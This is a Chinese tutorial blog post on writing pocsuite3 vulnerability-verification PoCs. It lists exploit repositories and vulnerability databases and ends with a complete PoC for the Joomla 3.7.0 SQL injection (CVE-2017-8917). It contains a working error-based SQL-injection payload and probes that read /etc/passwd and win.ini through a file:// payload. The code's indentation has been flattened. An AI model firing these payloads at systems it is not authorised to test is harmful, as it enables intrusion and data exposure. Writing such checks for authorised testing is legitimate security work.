0x01. 背景

在编写pocsuite时候,会查阅大量的文件,poc利用方式。

1. pocsuite是什么

Pocsuite 是由知道创宇404实验室打造的一款开源的远程漏洞测试框架。它是知道创宇安全研究团队发展的基石,是团队发展至今一直维护的一个项目,保障了我们的 Web 安全研究能力的领先。你可以直接使用 Pocsuite 进行漏洞的验证与利用;你也可以基于 Pocsuite 进行 PoC/Exp 的开发,因为它也是一个 PoC 开发框架;同时,你还可以在你的漏洞测试工具里直接集成 Pocsuite,它也提供标准的调用类。

感觉:有很多大公司,都是基于这个模板的壳来改的,这个算是安全圈内,漏洞扫描框架数一数二的存在。

0x02. pocsuite官方文档

官方地址:http://pocsuite.org/

项目地址:https://github.com/knownsec/pocsuite3/

编写手册:

0x03. 几个比较好的poc编写项目

1. exphub

https://github.com/zhzyker/exphub



Exphub[漏洞利用脚本库]

目前包括Webloigc、Struts2、Tomcat、Drupal的漏洞利用脚本,均为亲测可用的脚本文件,尽力补全所有脚本文件的使用说明文档,优先更新高危且易利用的漏洞利用脚本。

2. PeiQi-WIKI-POC

https://github.com/PeiQi0/PeiQi-WIKI-POC

PeiQI 师傅收集的poc,在安全圈内也很出名。

3. vulnerabilities

https://github.com/projectdiscovery/nuclei-templates/tree/master/vulnerabilities

博主编写了更为通用的yaml文件,将漏洞利用进行汇总。

4. 数字观星

https://poc.shuziguanxing.com/#/issueList

数字观星本来不公开poc,但是买poc,也列进来吧。

0x04.几个漏洞库

1. CNVD

https://www.cnvd.org.cn/flaw/list.htm?flag=true



2. 阿里云漏洞库

https://avd.aliyun.com/nonvd/list

3. 狼组知识库

https://wiki.wgpsec.org/knowledge/

虽然不是最新漏洞库更新集合,但也是一个很不错的知识库。

4. 奇安信NOX

https://nox.qianxin.com/vulnerability

也会更新漏洞,信息还算及时吧

5. paper

https://paper.seebug.org/

一个精华的网站,值得学习

0x04. poc编写注意事项

1.尽量使用官方库

from pocsuite3.api import requests
from pocsuite3.api import Output, POCBase,logger
from pocsuite3.api import register_poc
from pocsuite3.lib.utils import random_str

2.requests忽略https请求

verify=False
例如:
res = requests.get(vulurl, verify=False)

3.做异常抛出

try:
do something
except (KeyError,IndexError):
pass
except Exception as e:
# print(e)
logger.error(f"connect target '{self.url} failed!'")

4.响应不能太简单

不应单纯使用响应状态码作为判断条件,可添加页面关键字作为第二个判断条件

错误:if resp.status_code == 200:

正确:if resp.status_code == 200 and ‘xxxxxxxx’ in resp.text:

5.分辨Windows和linux

req = requests.get(url=vulurl,headers=headers, timeout=self.timeout, verify=False)
if r"root:x:0:0:root" in req.text and r"/root:/bin/bash" in req.text and r"/usr/sbin/nologin" in req.text:
if r"daemon:" in req.text and req.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = target
break
else:
payload = 'file:///C:windows/win.ini'
req = requests.get(url=vulurl, headers=headers, timeout=self.timeout, verify=False)
if r"app support" in req.text and r"[fonts]" in req.text and r"[mci extensions]" in req.text:
if r"files" in req.text and req.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = target
break

0x05. 示例poc

#!/usr/bin/env python3.8

from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from urllib.parse import urlparse
from pocsuite3.lib.utils import random_str
import random
import hashlib class DemoPOC(POCBase):
vulID = 'CVE-2017-8917'
version = 'Joomla 3.7.0'
author = ['姓名']
vulDate = '2017-5-17'#漏洞公布时间,可参考nvd漏洞发布时间
createDate = '2021-8-1'#poc创建时间
updateDate = '2021-8-1'#poc修改时间
references = ['https://nvd.nist.gov/vuln/detail/CVE-2017-8917']
name = 'Joomla! SQL注入漏洞'
appPowerLink = 'https://www.joomla.org/'
appName = 'Joomla'
appVersion = 'Joomla <3.7.1'
vulType = 'SQL注入漏洞'
desc = '''
Joomla! 3.7.1之前的3.7.x版本中存在SQL注入漏洞。远程攻击者可利用该漏洞执行任意SQL命令。
''' def _verify(self):
# 验证代码
result = {}
token = random.randint(1,10000)
upr = urlparse(self.url)
if upr.port:
ports = [upr.port]
else:
ports = [80,443,8080]
for port in ports:
target = '{}://{}:{}'.format(upr.scheme, upr.hostname, port)
if target:
try:
self.timeout = 5
payload = "/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({})),1)".format(token)
geturl = target + payload
res = requests.get(geturl, timeout=self.timeout, verify=False)
flag = hashlib.new('md5', bytes(str(token).encode('utf-8'))).hexdigest()
if res.status_code == 500 and flag in res.text :
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = target
break
except Exception as e:
print(e)
return self.parse_output(result)
def _attack(self):
return self._verify() def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output register_poc(DemoPOC)

参考

1.pocsuite

2.pocsuite编写手册

3.360漏洞云

最新文章

  1. sgu 240 Runaway (spfa)
  2. 移动web app开发必备 - Deferred 源码分析
  3. 05.virsh命令的常用操作(kvm)
  4. 20160113 js中选择多个check一块删除
  5. Access、Hybrid和Trunk
  6. javascript模块化应用
  7. U-boot新手入门
  8. C#操作项目配置文件
  9. Python自动化环境搭建
  10. 汇农PC个人中心总结
  11. Java开发API文档资源
  12. C++/C实现各种排序算法(持续更新)--冒泡排序,选择排序,归并排序
  13. usb描述符简述(二)
  14. vue-axios
  15. 3.2 unittest执行顺序
  16. 校内模拟赛 虫洞(by NiroBC)
  17. NPOI 之导入导出
  18. pyinstaller将python编写的打卡程序打包成exe
  19. XML,XSD,XSLT应用场景
  20. bootstrap-treeview 加载默认选择第一个节点

热门文章

  1. JAVA反序列化漏洞基础原理
  2. CLR无法从COM 上下文*****转换为COM上下文*****,这种状态已持续60秒。
  3. python 直接插入排序
  4. lua中的随机数
  5. Dockerfile 自动制作 Docker 镜像(一)—— 基本命令
  6. 【优化技术专题】「温故而知新」基于Quartz系列的任务调度框架的动态化任务实现分析
  7. .NET 中的HTTP 3支持
  8. 计算机网络 -- TCP/IP
  9. Docker入门系列之二:Docker术语
  10. Java基础系列(18)- if选择结构